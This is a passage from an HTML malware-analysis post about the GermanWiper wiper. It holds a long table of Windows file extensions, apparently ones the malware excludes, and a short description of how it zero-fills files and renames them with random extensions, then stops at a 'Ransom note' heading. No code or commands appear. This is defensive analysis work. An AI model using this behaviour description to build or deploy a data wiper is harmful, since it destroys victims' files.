<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.386</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.adv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ADV</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ani</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ANI</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.bat</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.BAT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.bin</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.BIN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.cab</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.CAB</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.cmd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.CMD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.com</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.COM</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.cpl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.CPL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.cur</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.CUR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.deskthemepack</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DESKTHEMEPACK</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.diagcab</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DIAGCAB</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.diagcfg</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DIAGCFG</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.diagpkg</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DIAGPKG</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DLL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.drv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DRV</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.exe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.EXE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.hlp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.HLP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.icl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ICL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.icns</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ICNS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ico</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ICO</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ics</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ICS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.idx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.IDX</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ldf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.lnk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.LNK</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.mod</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MOD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.mpa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MPA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.msc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">msp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.msstyles</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSSTYLES</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.msu</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSU</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.nls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.NLS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.nomedia</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.NOMEDIA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ocx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.OCX</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.prf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.PRF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.psl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.PSL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.rom</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ROM</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.rtp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.RTP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.scr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.SCR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.shs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.SHS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.spl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.SPL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.SYS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.theme</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.THEME</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.themepack</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.THEMEPACK</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.wpx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.WPX</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.lock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.LOCK</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.hta</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.HTA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.msi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSI</span></div>
<br />
<br /></td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="376" src="https://lh5.googleusercontent.com/J5-FuePVl_KWWwyG6kmztVm1-u55hdcnunmC9Mb9v-w0Mv6Bo4F5YfbYN_0Mc0ZLuqZ7OlFB5vYBndtyyqmKcdgwoMOQZUO4NXc-vmWHnA4xGzeOGP8VVoCh8cS0TvCNi0qcY2Yd" style="border: none;" width="624" /></span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Wiping data</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GermanWiper overwrites the file content with zero values and adds five random generated characters as file extension to the blank file.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="301" src="https://lh5.googleusercontent.com/hqOEwTcnnnVLOmIhWpZavRtVmuK7ncu7su1NzK7CI_0hCI6l0HRjVasPmURD0XYFAZL1buv4SRxU94RkZlbVxalB2hGjWr4vbyUD74M2PdCeGdCS0wBT0i3fDnxhRIZmSVVkh5CR" style="border: none;" width="487" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="94" src="https://lh4.googleusercontent.com/gvzj5WzDkeKHiu_rmfrgMxISZFih22T6uNWuCwjAZySiPos2eCzExtFP38UQtCDJ9fBINF0PAqXVwjM0UZlshRMWFgX8FVhIP_a6a3d4eVuqtmGXWkMEyMt7z0OVcTfz4tvRlKdB" style="border: none;" width="325" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="386" src="https://lh5.googleusercontent.com/zbltyMWnxjy7e1CHsinGUkWOXPvICKlDUiv3o-Bk-i4FF0v0IiBH22RYfBEkpDQMy5MK91VcVUa2S6mI7hbzowq1MFm6ZQVIOJiNCE3xy5vTprV5ncj_X2JNYMW3S-iWUQUm4TEN" style="border: none;" width="697" /></span></div>
<h1 dir="ltr" style="line-height: 1.2; margin-bottom: 6pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ransom note</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
